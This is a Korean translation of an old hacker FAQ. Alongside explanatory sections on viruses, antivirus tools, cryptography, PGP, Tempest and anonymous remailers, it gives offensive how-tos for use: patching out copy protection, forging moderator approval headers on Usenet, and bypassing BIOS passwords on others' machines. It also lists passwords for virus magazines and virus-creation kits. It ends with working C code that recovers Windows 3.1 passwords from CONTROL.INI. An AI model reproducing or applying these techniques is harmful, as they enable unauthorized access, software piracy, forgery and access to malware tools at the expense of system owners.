트로이 목마를 기억하는가? 도시에 악독한 짓을 하기
위해 나쁜 놈들이 그 안에 숨어 있던 것이다. 트로이 컴퓨터 프로그램은
이와 비슷하다. 허가된 프로그램 속에서 허가되지 않은 기능을 수행하는
것이 바로 이 프로그램이다. 이것은 자신이 해야할 것이 아닌 다른
것, 대개는 (꼭 그런 것은 아니지만) 악의에 찬 어떤 것을 한거나,
프로그래머가 의도했던 것이 아닌 것을 하는 프로그램이다. 의도된
것이 아니라면, 버그라고 불러야 하고, 때때로 특징이라고 부를수도
있다. 몇몇 바이러스 검색 프로그램(scanner)에서 트리이 목마 프로그램을
검출한다. 어떤 바이러스 검색 프로그램은 트로이 목마를 검색할 수
없다. 어떤 바이러스 스캐너도 모든 트로이 목마 프로그램을 다 검출할
수 없다.
바이러스:
바이러스는 자신을 복재하는 독립적인 프로그램이다.
다른 프로그램에 기생할 수 있고, 자신의 복사를 만들 수 있다.(마치
기생 바이러스에서와 같이) 바이러스는 데이터를 망치거나 오염시킬
수 있다. 그리고 데이터를 변경하거나, 메모리나 디스크 공간을 이용함으로서
시스템의 성능을 저하시킬 수 있다. 어떤 바이러스 검색 프로그램은
바이러스를 검출한 다. 어떤 바이러스 검출 프로그램도 모든 바이러스를
검출할 수는 없다. 어떤 바이러스 검색 프로그램도 모든 혹은 일부,
알려지거나 혹은 알려지지 않거나, 현재 또는 미래의 바이러스로부터
보호할 수 없다.
웜:
Robert Morris Jr.에 의해서 유명하게 되었다. 웜은
자신을 증식한다. 시스템에서 시스템으로 증식하고 때때로 시스템의
성능을 떨어뜨린다. 자체로 완벽하고 네트워크를 이용하여 퍼져나간다.
이것은 바이러스가 디스크를 이용하는 것과 같다. 어떤 이는 바이러스나
웜에 대한 대책은 파일이나 네트워크를 가지지 않는 것이라고 한다.
아마 맞을 것이다. 아마 컴퓨터도 이 목록에 포함해야 할 것 같다.
논리 폭탄:
특정조건이 만족되면 특정형태의 '공격'을 하는 코드이다.
예를 들어, 12월 5일에 모든 파일을 지워버리는 논리폭탄이 있을 수
있다. 바이러스와 달리 논리폭탄은 자신을 복제할 수 없다.
바이러스 같은 것으로부터 나 자신을 어떻게 보호할
것인가?
이 FAQ는 Theora에 의해서 작성되었다.
가장 흔한 바이러스는 부트 섹터를 감염하는 것이다.
이러한 형태의 바이러스로부터 자신을 보호하기 위해서는 기록을 할
필요가 없는 디스크는 전부 기록방지하는 것이다. 확실히 기록방지된
부팅 디스켓을 보관하고 있어야 한다. 바이러스가 나타나면 일을 매우
쉽게 할 것이다.
좋은 바이러스 검색 프로그램으로 새로운 파일들을 조사해야 한다. 좋은 것들로 F-Prot, Dr.
Solomon's Anti-Virus Toolkit, 그리고 Thunderbyte
Anti-Virus가 있다. AVP 또한 좋은 프로그램이다. 한 가지 이상의
검색 프로그램을 가지고 있는 것이 좋다. 이번 달에 한 두 사람이
빠뜨린 바이러스가 있을 수 있으니까.
하루 8개의 바이러스가 평균적으로 만들어 진다. 어떤
바이러스 검색 프로그램도 그 추세를 좇아갈 수 없다. 그러나, 위의
4개는 현 추세를 좇아가고 있는 좋은 것들이다. 좋은 바이러스 검색
프로글매이라면 대부분의 주요 바이러스를 검출할 수 있다. 어떤 바이러스
검색 프로그램도 모든 바이러스를 검출할 수 있는 것이 아니다.
현재 5600여종의 바이러스가 있다. 항상 새로운 것이
작성된다. 바이러스 검출을 위해서 바이러스 검색 프로그램을 사용하고
있다면 자주 갱신을 해야 한다. 이상행동 방지 프로그램에 의존하고
있다면 이러한 종류의 프로그램은 쉽게 피해갈 수 있는 기법이 있음을
알아야 한다.
검색 프로그램과 무결성 조사 프로그램을 이용하려 한다면
이것이 보호에 어느정도 도움은 되지만 완벽한 것이 아님을 알아야
한다 .
상주 스캐너(resident scanner)와 같은 바이러스 검색
프로그램을 원할 수 있다. 이러한 프로그램은 램에 상주하여 프로그램
수행을 감시한다.(그리고 때때로 프로그램을 포함하는 파일을 감시하기도
한다.) 프로그램을 수행하려 하면 상주 스캐너는 제어권을 넘겨받고
프로그램을 먼저 검사한다. 바이러스가 없으면, 프로그램은 수행할
수 있도록 허가된다.
바이러스 검색 프로그램은 대부분의 트리이 목마 프로그램,
웜, 논리폭탄으로 보호해 주지 않는다. 이론적으로 논리폭탄 그리고/도는
웜으로부터 보호할 수 있지만, 대개는 그렇게 하지 않는다.
가장 좋은 방법은, 그리고 실제로 유일한 방법은, 시스템에
무엇이 있는지 알고 그것들이 자신에 의해 허가된 것들인지를 아는
것이다. 중요한 파일은 자주 백업을 해야 한다. DOS 시스템 파일은
기록방지해야 한다. 기록할 필요가 없는 모든 디스크는 기록방지를
한다. 바이러스가 생기면 놀라지 마라. 잘 모르면 회사 내의 지원부서를
불러서 anti-virus 프로그램을 이용하게 한다. 대바이러스(anti-virus)
프로그램을 공급한 회사의 지원이 부실한 경우는 회사를 바꾸라.
바이러스가 퍼지지 않도록 하는 가장 확실한 방법은
안 퍼뜨리는 것이다. 어떤 이들은 고의적으으로 퍼뜨린다. 그렇게
하지 않기를 바란다. 바이러스는 그렇게신나는 것이 아니다.
이 FAQ는 Theora에 의해서 작성되었다.
어셈블리 언어 프로그램 책은 (지루한) 복제의 일면을
보여주고, 장기간 설명한다. 바이러스에 대하여 가장 흥미롭고/신나는
것은 논쟁이다. 자유 의사표시(free speech), 적법성, 그리고 바이러스의
증상들은 "find first"와 "find next" 함수의
호출을 추적하는 것보다 재밌다. 바이러스를 발견하면 바이러스에
대한 기술적인 정보나 도움을 virus-l FAQ에서 얻을 수 있다. 이것은
comp.virus에 흔히 올라와 있다. 여기서는 다양한 논쟁도 엿볼수 있다.
alt.virus와 같은 뉴스그룹도 있다. 그러나, 기술적인 전문성은 높지가
않다. 그리고 바이러스를 없애려는 사람들에게 크게 도움이 되지는
않는다.
바이러스의 전문가는 많이 있다. 자신을 전문가라고
생각해도 된다. 물론 농담이지만. 바이러스을 이해하기 위해서는 프로그래밍,
운영체제와 그 상호동작을 알아야 한다. 바이러스족(Cult of Virus)에
대해서 모두 이해하기 위해서 많은 식별과정이 필요하다. 바이러스와
바이러스족에 대한 좋은 논문이 많이 있다. Virus-l의 FAQ에 수록된
사람들로부터 그들에 대한 정보를 얻을 수 있다. FTP 사이트 ftp.informatik.uni-hamburg.de에는
좋은 프로그램과 문서가 있다.
이 FAQ는 Computer Security Basics라는 책에서 인용한
것이다.
메시지는 평문(plaintext, clear text)이라고 불린다.
메시지의 내용을 숨기기위한 과정을 암호화(encryption)라고 한다.
암호화된 메시지는 암호문(ciphertext)이라고 부른다. 암호문을 평문으로
만드는 것을 복호화(decryption)이라고 한다.
메시지를 안전하도록 하는 기술이나 과학을 암호제작(cryptography)라고
한다. 그리고 암호학은 암호제작자(cryptographer)들에 의해서 행해진다.
암호분석가(cryptanalysist)는 암호분석(cryptoanalysis)를 행하는
사람들로, 암호해독은 암호문을 깨는 것이다. 다시 말해서 숨겨진
것을 본다는 것이다. 암호법과 암호분석을 합하여, 수학에서는 암호학(cryptology)이라고
한다. 그리고 이것을 행하는 사람들을 암호학자(cryptologist)라고
한다.
이 FAQ는 PGP(tm) User's Guide Volume I: Essential
Topics by Philip Zimmermann의 인용문이다.
PGP(tm)은 공개키 암호를 이용하여 E-mail와 데이터 파일을 보호한다.
안전하기 않은 통로를 통해서 안전하게 통신하기 위해서는
키의 교환이 필요하다. PGP는 기능이 잘 되어 있고 빠르다. 복잡한
키 관리, 디지탈 서명, 데이터 압축 그리고 훌륭한 인간공학적 설계이
되어 있다.
Pretty Good(tm) Privacy(PGP)는 Phil's Pretty Good
Software에서 만들었으며, MS-DOS, UNIX, VAX/VMS 와 여러 컴퓨터에서
수행한다. PGP는 사람들이 프라이버시의 보호 및 인증을 편리하게
할 수 있게 한다. 프라이버시란 메시지를 받게 되어 있는 사람만이
메시지를 읽을 수 있도록 한다는 것을 의미한다. 인증이란 메시지를
보낸 사람이 정말 그 사람인지를 확증하는 것이다. 편리성이란 브라이버시와
인증이 일반적인 암호화 프로그램과는 달리 키를 관리하는 것이 쉽다는
것이다. 사용자 간의 키를 교환하는데 있어서 안전한 통로가 필요하지
않다. 따라서 PGP을 사용하는 것이 쉽다. 이것은 PGP가 공개키(public
key) 암호화 기법을 사용하고 있기 때문이다.
Tempest는 Transient Electromagnetic Pulse Surveillance
Tehcnology의 약어이다.
컴퓨터와 전자장비는 주변에 간섭을 한다. 비디오 모니터
두 개를 가까이하면 이같은 현상을 확인할 수 있다. 모니터를 떼어
놓을 때까지 그림이 잘 안 보인다. 컴퓨터에서 나오는 디지털 신호는
관찰자에게 중요한 것이다. 이러한 전파의 방출은 두 경로가 있다.
방사 방출(radiated emission)과 유도 방출(conducted emission)이다.
방사 방출은 전자 장치이 조립되어서 마치 안테나와 같은 역할을 하는
것이다. 유도 방출은 방사가 케이블이나 선에 의해서 전자 유도되는
형태이다.
대부분의 경우 이러한 방출은 단지 귀찮은 것이지만
매우 유용할 때가 있다. 목표물이 어떤 프로젝트를 하고 있는지 알고
싶다고 생각하자. 사무실 밖에 있는 자동차에서 정교한 전자 장비를
이용하여 모니터로부터 방출되는 신호를 분석하려고 할 수 있다. 이러한
방출은 대개 55-245Mhz 사이에 존재하고 1킬로미터 밖에서도 읽을
수 있다.
감시 장비는 주파수의 차이에 따라서 전파를 방출하는
장치를 구분할 수 있다. 예를 들어 VDU의 구성요소, VDU를 재생하기
위한 생성과정, 라인 싱크 등을 구분할 수 있다. raster(래스터) 신호을
일치시킴으로 수동적이고 실시간으로 화면을 구성할 수 있다. 이러한
기술은 정부 기관이 아니라 누구라도 얻을 수 있는 것이다.
목표에서는 전자의 방출을 막을 수 있다. 또는 방출이
매우 낮은 장비를 사용할 수 있다. Tempest 인증은 정부 문서인 NACSIM
5100A(비밀)의 규정을 통과한 것을 의미한다. 이 문서는 처리 중인
정보를 방출하지 않을 수 있는 수준을 정해 놓았다.
익명 재전송 메일(anonymous remailer)이란 무엇인가?
이 FAQ는 Raph Levien에 의해 작성된 것이다.
익명 재전송 메일(Anonymous remailer)는 인터넷 상의
시스템으로 Usenet에 메시지를 익명으로 보낼 수 있도록 하는 것이다.
널리 사용되는 익명 재전송 메일은 두 가지가 있다.
첫째의 것이 anon.penet.fi 형이다. 두 번째는 cypherpunk 형이다.
anon.penet.fi에 있는 형태의 것은 매우 인기가 있다. 160,000명 이상의
사용자가 이용했다. 약 수만명의 이용자가 날마다 이용하고 있는 것으로
생각된다. 이것의 큰 장점은 사용하기 쉽다는 것이다. cypherpunk
메일러는 보안성이 좋아서 인기가 높아가고 있다.
anon.penet.fi 시스템은 사용자는 익명 id를 얻어야
한다. 이미 하나 가지고 있는 사람에게 메일을 보내거나, ping@anon.penet.fi에
메일을 보내면 된다. 각각의 경우에 penet은 새로운 익명 id를 보내
준다. 예를 들어 an123456@anon.penet.fi와 같다. an123456은 시스템의
다른 사용자에게 메일을 보낸다. 다음과 같은 일이 일어난다.
1. 메일은 anon.penet.fi로 전송되어 Finland의 Espoo 근처에 있게 된다.
2. 이 단계는 anon.penet.fi에서 수행하는 소프트웨어에 의한다. Penet은 송신자의 email 주소를 데이터베이스에서 검색하고 숫자 코드로 그것을 대치한다. 이를 제외한 송신자에 대한 모든 정보는 삭제된다.
3. 그리고 나서 penet은 같은 데이터베이스에 있는 수신자의 번호를 검색한다. 그리고 실제의 email 주소로 대치한다.
4. 마지막으로 email을 수신자의 실제 주소로 보낸다.
이러한 방식에는 Usenet에 포스팅하는 것과 같은 다른 변형이 있을 수 있다.(이 경우 단계 3이 제외된다.) 그러나, 앞의 단계들이 기본적인 생각이다.
anon.penet.fi가 email 주소와 anon의 id를 비교할 때, 비밀 데이터베이스를 사용하는 반면에 cypherpunks의 재전송메일은 실제 자신을 숨기기 위해서 암호기법을 이용한다. 실제 email 주소으로 자신의 실제 신분을 숨기고 email을 보내거나 Usenet에 포스팅을 하려고 한다고 가정하자.
재선송메일러를 통해서 보내기 위해서 다음과 같은 일이 일어난다.
1. 메시지와 수신자의 주소를 암호화한다. 이 때 키는 재전송메일러가 선택한 공개키를 이용한다.
2. email을 재전송메일러에 보낸다.
3. 재전송메일러가 메일을 받을 때, 비밀키를 이용하여 복호화한다. 평문이 메시지와 수신자의 주소가 나타난다.
4. 송신자에 대한 모든 정보가 삭제된다.
5. 마지막으로 송신자의 주소로 email을 보낸다.
재전송메일러의 관리자를 믿는다면 이것은 꽤 괜찮은 편이다. 그러나, cypherpunks의 재전송메일러의 전체적인 점은 어떤 개인이나 시스템도 믿을 필요가 없다는 것이다. 따라서, 정말로 보안을 원하는 사람들은 재전송메일러를 연쇄적으로 사용할 수 있다. 만일 이러한 연결 중의 재전송메일러가 정직한 것이라면 메시지의 프라이버시가 보장된다.
연쇄적인 재전송메일러를 사용하기 위해서 먼저 러시아의 매트료시카 인형(양파)처럼 여러 층으으로 메시지를 암호화한다. 이러한 메시지를 준비하는 것은 지루하고 실수가 일어날 소지가 많으므으로 사람들은 자동화된 도구(premail package와 같은)를 이용한다. 어쨌던 메시지를 준비하고 나서, 첫 번째 수신 재전송메일러에 보낸다. 이것은 암호화의 가장 바깥쪽에 있는 것과 대응된다.
각 재전송메일러는 암호화된 층을 하나씩 벗겨서 다음 곳으로 보내어 최종 재전송메일러에 도착하게 된다. 이 때, 가장 안 쪽의 암호화된 메시지만 남는다. 이것이 풀리면 평문과 수신자의 주소이 나타난다. 이 때 메시지는 실제 수신자에게 보내진다.
재전송메일은 많은 지역에 위치한다. 일상적인 메시지는 목적지에 도착하기 전에 캐나다, 네델란드, Berkeley대학 그리고 핀란드을 지나게 된다.
암호화된 메시지를 준비해야하는 어려움과 더불어, cypherphunk의 재전송메일러의 또 다른 단점은 anonymous mail에 대한 응답이 쉽게 오지 않는다는 것이다. 송신자 측의 모든 정보가 사라진다. 그렇지만 새로운 에일리어스 서버가 그것을 변경하려고 한다. 에일리어스 서버를 이용하려고 하면, 새로운 email 주소를 만들어야 한다(내것은 raph@alpha.c2.org이다.) 이 새 주소로 보내진 메일은 그 사람의 실제 주소로 보내지며 그 과정은 알 수 없게 된다.
이것을 해결하기 위해, 먼저 email 주소를 여러 층으로 암호화를 한다. 그리고나서 암호화된 통로을 통해서, 사용하고자 하는 nickname과 함께 암호화된 주소를 에일리어스 서버에 보낸다. 에일리어스 서버는 암호화된 주소를 데이터베이스에 등록한다. 에일리어스 서버는 응답 메일을 anon.penet.fi와 같은 방시으로 처리하는데 익명 재전송메일러의 연쇄를 통해서 전달한다는 것이 다르다.
최대의 보안을 하기 위해서, 사용자는 사용자는 연쇄의 재전송메일러가 email주소에서 한 암호화 층을 제거할 때 또 다른 층의 암호화를 추가할 수 있다. 사용자가 최종적으로 email을 얻을 경우, 다층의 암호화가 되어 있다. 매트료시카 인형은 한 번에 하나씩 꺼내어 마지막 평문 메시지가 드러나도록 한다.
마지막으로 생각할 점은 재전송메일러들이 모두 안정적이어야
한다는 것이다. 이것은 특히 연쇄적인 재전송메일러를 이용했을 경우에
그렇다. -- 하나라도 제대로 동작하지 않는 것이 있다면 메시지는
없어지게 된다. 이것은 왜 필자가 안정적인 재전송메일러의 목록을
유지하고 있는지의 이유이다. 안정적인 제전송메일러를 선택하면 메시지가
원하는 곳에 도착할 확률이 매우 높다.
가장 인기좋고 안정적인 익명 재정송메일러는 anon.penet.fi이며 Johan Helsingus에 의해 운영되고 있다. 익명 ID를 얻을려면 ping@anon.penet.fi로 메일을 보내기 바란다.
anon@penet.fi의 서버는 실제 메일이 전송되어 온 곳의 어떤 정보라도 지우기 위해 최선을 다한다. 자신을 드러낼 수 있는 정보가 그러한 메시지에 포함되지 않도록 노력한다. 메시지를 다음과 같은 주소로 보낸다.
anXXX@anon.penet.fi
이제 자신을 포함한 다른 익명 사용자의 email 메시지의 송신지가 anon.penet.fi가 된다.
alt.security@anon.penet.fi
익명 메시지를 전체 Usenet 그룹에 포스팅한다고 하자. 이 경우에는 (핀란드에 있는)local site에 있는 alt.security로 한다고 하자.
ping@anon.penet.fi
만일 이 주소로 메일을 보내면 신분(identity)이 하나 할당된다.(이미 가지고 있지 않다고 가정한다.) 여기서 자신의 신분을 확인해도 된다.
자신의 패스워드를 설정할 수도 있다. 이 패스워드는 자신이 보내게 될 메시지를 인증한다. 이 패스워드는 전송할 메시지에 포함한다. 패스워드를 설정하기 위해서 password@anon.penet.fi로 본문에 패스워드를 포함하여 메일을 보낸다. 예를 들어
To: password@anon.penet.fi
Subject:
TN0_rUlEz
더 자세한 정보를 얻기 위해 다음으로 메일을 보낸다.
help@anon.penet.fi
익명 Usenet 포스팅은 그들의 의견은 가치가 없다고 주장하는 다른 Usenet 그룹의 사용자에 의해서 전달된다. 이것은 그들이 익명성이 다른 사람의 공격을 막아주기 위해 사용되고 다른 한편으로 사회적인 편견으로부터 자신을 보호하기 위한 것이라고 믿기 때문이다. (사람들이 자신의 의견을 상관에게 개진할 때) 또한 이것을 공권력에 대해 자신의 신분을 숨기는 도구로 생각하고 있다면 다시 한 번 더 고려를 해 보라. 왜냐하면 판사가 서버의 관리지에게 포스팅한 사람의 신분을 밝힐 것을 명령한 유명한 판례가 있기 때문이다.
익명 재전송메일러의 목록을 보고 싶다면 finger remailer-list@kiwi.cs.berkeley.ede를
하거나 웹 브라우저를 이용하여 http://www.cs.berkeley.edu/~raph/remailer-list.html를
보기 바란다.
복사방지를 깨기위한 두가지 흔한 방법이 있다. 프로그램을
이용하여 복사방지를 제거하는 것이 첫 번째이다. 인기 있는 프로그램으로
Central Point Software의 CopyIIPC와 Quaid Software의 CopyWrite이
있다. 두 번째 방법은 복사 방지 프로그램을 패치하는 것이다. 인기
있는 소프트웨어에 대한 만들어진 패치를 구할 수 있다. hex 편집기를
이용하여 패치를 한다. 패를 구할 수 없다면 혼자서 패치를 해야 한다.
패치를 하기 위해서는 디버거가 있어야 한다. Soft-Ice나
Sourcer같은 것들이 있다. 어셈블리 언어에 대한 약간의 지식도 필요하다.
디버거에서 복사방지 프로그램을 읽어서 복사 방지 기법을 알아낸다.
위치를 찾아내면 코드를 변경한다. 코드를 JE와 같은 경우 JNE나 JMP로
바꿀 수 있다. 아니면 NOP 명령으로 바꿀 수 있다.
127.0.0.1은 네트워크 접속의 루프백(loopback)이다.
telnet, ftp를 하면 자신의 기계로 접속한다.
관리자 있는 뉴스그룹(moderated newsgroup)에 어떻게
포스팅을 하나?
Usenet 메시지는 메시지 헤더와 메시지 보디가 있다.
메시지 헤더는 뉴스 소프트웨어(reader)가 메시지를 어떻게 처리할
지 알려준다. 헤더는 두 부류로 나뉜다. 각각 필요한 것과 옵션인
것이다. 필요한 헤더는 "from"과 "Newsgrups"과
같은 것이다. 필요한 헤더없이 메시지는 제대로 포스팅되지 않는다.
옵션 헤더에는 "Approved" 헤더가 있다. 관리되는
뉴스그룹에 포스팅을 하기 위해서 메시지 헤더에 허가된(approved)
헤더 줄을 추가하기만 하면 된다. 헤더 줄에는 뉴스그룹 관리자 e-mail
주소가 있어야 한다. 대상 뉴스그룹에 대한 바른 포맷을 보려면, 뉴스그룹에서
메시지를 저장하여 문서 편집기를 가지고 보도록 한다.
"Approved: 헤버 줄은 다음과 같아야 한다.
Approved: will@gnu.ai.mit.edu
메시지 헤더에는 빈줄이 있어서는 안 된다. 빈 줄은
메시지의 일부로 해석된다.
더 상세한 정보는 RFC 1036을 읽기 바른다. USENET 메시지의
전송에 대한 표준이다.
e-mail->Usenet 게이트웨이를 통해서이다. e-mail 메시지를 <newsgroup>@<servername>으로
보낸다. 예를 들어, alt.2600에 nic.funet.fi를 통해
포스팅을 하기 위해서 메일을 alt.2600@nic.funet.fi로 보낸다.
e-mail->Usenet 게이트웨이의 예가 있다.
group.name@news.demon.co.uk
group.name@charm.magnus.acs.ohio-state.edu
group.name@undergrad.math.uwaterloo.ca
group.name@nic.funet.fi
group.name.usenet@decwrl.dec.com
BIOS가 어떤 것이냐에 따라서 달리진다. 일반적인 BIOS에는
AMI, Award, IBM과 Phoenix 것이 있다. 다른 BIOS도 많이 있따. 그러나,
이것들이 가장 흔한 것이다.
어떤 BIOS는 시스템이 부팅하기 전에 패스워드를 물어본다.
어떤 것은 BIOS 셋업을 하기 전에 패스워드를 묻는다.
모든 BIOS는 이러한 정보를 어딘가에 저장해 두어야
한다. 부팅이 온전하게 된 기계에 접근할 수 있따면, 패스워드를 볼
수 있을 것이다. 패스워드가 숨겨진 메모리 주소를 알아야 한다. 그리고
패스워드가 저장된 포맷도 알아야 한다. 또는 이것을 행할 수 있는
프로그램을 가지고 있어야 한다.
Ami BIOS에 대한 패스워드 공격 프로그램이 가장 흔하다.
어떤 패스워드 공격 프로그램은 평문으로 된 AMI BIOS의 패스워드를
돌려준다. 어떤 것은 ASCII로 된 코드를 돌려주고, 어떤 것은 스캔
코드로 된 것을 돌려준다. 이는 Ami BIOS의 버전에 따라 달라질 수도
있는 것이고 단순히 패스워드 공격 프로그램에만 따라 달라지는 것이
아니다.
BIOS 패스워드 공격 프로그램을 얻고 싶다면, ftp를
이용하여 oak.oakland.edu/simtel/msdos/sysutil/에서 받아가기 바란다.
파워를 켜고 난 상태에서 시스템에 접근할 수 없을 경우에도
패스워드를 우회할 수 있다. 패스워드는 CMOS 메모리에 있으며, 이것은
마더보드에 있는 배터리에 의해서 전원이 꺼져 있을 때도 유지된다.
배터리를 제거하면 CMOS 정보가 날아간다. 기계를 다시 사용하기 위해서
CMOS 셋업을 다시 해 주어야 한다. 기계의 주인이나 사용자는 BIOS의
패스워드가 없어진 것을 알고 놀라게 될 것이다.
어떤 마더보드에서는 배터리가 마더보드에 납땜되어
있어 분리하기 어렵다. 만약 이런 경우라면, 다른 방법이 있다. 마더보드에서
패스워드를 지우는 점퍼를 찾는다. 마더보드의 매뉴얼이 있으면 그
점퍼의 위치를 알 수 있다. 그렇지 않다면, 마더보드에 점퍼가 표시되어
있을 것이다. 두 경우에 해당하지 않는다면,어떤 점퍼인지 추측해
볼 수 있다. 대부분의 경우 배터리 근처에 점퍼가 있다.
이 FAQ는 crypt에 의해서 작성된 것이다. <crypt@nyongwa.montreal.gc.ca>
Magazine Password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~
VLAD Magazine Issue #1 vlad
VLAD Magazine Issue #2 vx
VLAD Magazine Issue #3 virus
NuKE InfoJournal Issue #2 514738
NuKE InfoJournal Issue #3 power
NuKE InfoJournal Issue #4 party
Program
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~
Sphere Hacker 1.40 & 1.41 theozone
Virus Creation 2000 high level
Virus Construction Lab Chiba City
Ejecutor Virus Creator EJECUTOR
Biological Warfare v0.90 lo tek
Biological Warfare v1.00 freak
C/C++ 로 실행코드를 역컴파일할 수 있는 가능성은 없는가?
이 FAQ는 Bob Stout이 쓴 SNIPPET에서 인용한 것이다.
숨을 멈추지 마라. 생각을 해 보라. 역컴파일러가 작동하기
위해서 먼저 1) 모든 컴파일러가 최적화가 가장 잘 설정되었을 때라도,
동일한 코드를 생성해야 하고, 2) 역컴파일러가 어떤 컴파일러이 작성한
코드를 알아야 한다.
만일 첫 번째 조건이 맞다면, 모든 컴파일러 벤치마크는
소용없을 것이다. 왜냐하면 모든 코드가 동일한 동작을 하기 때문이다.
두 번째 경우가 참이라면, 새로운 컴파일러가 나오는 것을 고려하은
매우 거대한 프로그램이 되어야 한다.
좋다. 특정 컴파일러에 대한 특별한 역컴파일러라면
어떨까? - BC++ 4.5에만 적용되는 역컴파일러라면 어떨까? 이 경우
최적화 문제에 닿게 된다. 명확하고 이해하기 쉽게 작성된 코드는
대개 비효율적이다. 최대의 성능을 위해서 작성된 코드는 대개 난해하다.
여기에 덧붙여 요새 컴파일러은 어떤 최적화를 사용할지 아닐지에
대한 스위치가 있다. 요점은 큰 프로그램의 경우 최적화 스위치를
바꿈으로 다양한 오브젝트 모듈이 생성된다는 것이다. 그래서 역컴파일러는
어떤 최적화 스위치를 사용했는지 알 수 있어야 한다.
좋다. 더 간단하게 특정 컴파일러의 최적화를 번역하지
않고 가장 논리적인 원시 코드를 역컴파일한다고 하자. 그럼 어떻게
되는가? 좋은 최적화기는 코드의 내부과정을 재작성하기 때문에, 역카일해서
얻는 결과는 읽기 어려울 뿐만 아니라, 대부분의 경우 goto 문과 좋은
프로그램에서는 사용해서는 안 될 것들로 가득 차 있을 것이다. 여기서
역컴파일된 원스 코드는 얻게 되겠지만 무슨 소용이 있겠는가?
그리고 원시 모듈에 대해서 주목하자. C의 특성중의
하나가 쉽게 유지보수할 수 있는 원시 모듈(.C)로 쪼개져 있지 않을
경우 전체로는 읽기 어렵게 된다는 것이다. 역컴파일러가 그것을 어떻게
하겠는가? 역컴파일러는 하나의 거대한 main()함수를 만들어서 모듈성을
상실하게 한다. 또은 함수 하나하나를 하나의 파일로 만들려 할 수
있다. 전자의 경우 쓸모 없는 거대한 파일을 생성하고 두 번째의 경우
static의 함수나, 변수를 부를 경우 문제를 야기한다. 역컴파일러가
static 변수를 global로 만들수도 있으나, 역시 허용할 수 없는 것이다.
마지막으로 대부분의 상용 응용 프로그램들은 수행시간이
짧아야 하는 기능들은 어셈블리로 작성한다는 것이고 이것은 C로 역컴파일하기가
거의 불가능하다는 것이다.
내가 말했듯이 숨을 멈추지마라. 역컴파일을 가능하게
하는 기술들이 발전함에 따라서 새로운 최적화기와 언어(C++과 같은)는
그같은 것을 만들기 더 어렵게 할 것이다.
오랫동안 UNIX 응용프로그램은 지저분한 소스 코드 형태로
배포되어(기계나 읽을 수 있지 인간은 이해할 수 없는 - 모든 공백문자와
코맨트를 지우고 변수이름은 OIOI 등으로 바꾸어) 저작권을 보호하려
했다. 역컴파일러의 결과물도 지저분한 소스 코드와 마찬가지로 이해하기
어려울 것이다.
MS-Windows의 패스워드 암호는 어떻게 동작하나?
이 FAQ는 Wayne Hoxie<hoxsiew@crl.com>에 의해서
작성되었다.
MS Win 3.1에서 패스워드 옵션은 쉽게 우회할 수 있다.
그러나, 윈도우에서 어떻게 패스워드를 처리하는지 궁금해 하는 사람들이
있을 것이다. 실제 패스워드를 아는 것이 유용한 많은 이유가 있다.
UNIX의 root 패스워드와 윈도우의 패스워드를 동일하게 사용하고 있다고
생각해 보라.
어쨌던, 알게 된 알고리즘을 전달하겠다.
패스워드를 치고 [OK] 버튼을 누르고 난 다음의 과정부터
설명을 한다.
모든 사람이(적어도 흥미를 가지고 있는) XOR 연산이
무엇인지 알고 있다고 가정한다.
먼저, 패스워드의 길이가 저장된다. 이것을 'len'이라고 부르겠다. 입력된 문자열을 암호화하여 다른 문자열로 바꾼다. 먼저 입력된 문자열을 'plain text(평문)'이라고 부르겠다. 그리고 암호화된 문자열(두번의 과정을 거치는데)을 'hash1', 'hash2'라고 부르겠다. 평문의 위치는 이 과정에서 중요한데 이것을 'pos'라고 부르자. 해슁 과정의 각 단계를 거치고나서, 문자는 윈도우가 특별하게'special' 생각하는 문자열과 비교된다. 이 문자들은 '[ ] ='와 ASCII 33 이하나 ASCII 126 이상의 문자이다. 이 검사 연산을 'is_ok'라고 부르겠다. 모든 인텍스는 0을 기준으로 한다.(다시 말해 8개의 문자 패스워드는 0부터 7까지이다.)
이제, '평문'의 첫 번째 문자는 'len'과 xor되어 'is_ok'로 들어간다. 정당한 문자가 아닌 경우, 원래의 '평문'의 문자로 대치되어 다음 연산으로 진행한다. 다음 연산에서 'pos'와 xor 연산을 한다.(이것은 첫 번째 연산에서는 소용없는 것이다 왜냐하면 'len'이 0이고 0과 xor된 것은 그 자신이 되기 때문이다.) 그리고 'is_ok'로 보내고 올바른 것이 아닐 경우 원래의 것으로 대치한다. (문자 당) 마지막 연산은 xor를 앞의 '평문'의 문자와 xor하는 것이다. 이전 문자가 없으므로, 고정된 값 42를 '평문'의 첫 번째 문자에 대해 사용한다. 이것은 'is_ok'로 보내지고 만일 OK라면, 'hash1'의 첫 번째 위치에 저장된다. 이 과정은 평문의 모든 문자에 대해 전부 수행한다. 다음 패스(pass)는 매우 유사하다. 시작점이 hash1의 마지막 문자이다. 그리고 결과는 뒤에서 앞으로 hash2에 들어간다. 또한, 마지막 xor하는 시점에서 이전 문자를 이용하는 대신 현재 문자 다음의 문자가 이용된다. hash1에서 마지막 다음에 나오는 문자가 없으므로, 42값이 마지막 문자대신에 이용된다.
'hash2'는 마지막 문자열이고 윈도우가 CONTROL.INI에 저장하는 값이다.
패스워드를 복호화'decrypt'하기 위해서 위의 과정을 단지 거꾸로 하면 된다.
이제, 기다렸던 것이 왔다. 우리를 위해 어려운 일을
해 줄 C 코드이다.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int xor1(int i,int j)
{
int x;
x=i^j;
return (x>126||x<33||x==91||x==93||x==61)?i:x;
}
void main()
{
FILE *f;
int i,l;
char s[80],s1[80];
printf("Please enter the path to your Windows directory\n");
gets(s1);
sprintf(s,"%s%scontrol.ini",s1,s1[strlen(s1)-1]=='\\'?"":"\\");
if((f=fopen(s,"rt"))==NULL){
printf("File Error : %s\n",sys_errlist[errno]);
exit(0);
}
while(strnicmp(fgets(s1,70,f),"password",8)!=0&&!feof(f));
fclose(f);
strtok(s1,"=\n");
strcpy(s,strtok(NULL,"\n"));
i=strlen(s)-1;
for(l=i;l>-1;l--)
s1[l]=xor1(xor1(xor1(s[l],l==i?42:s[l+1]),l==i?0:l),i+1);
for(l=0;l<i+1;l++)
s[l]=xor1(xor1(xor1(s1[l],l?s1[l-1]:42),l?l:0),i+1);
printf("The Password is: %s\n",s);
}
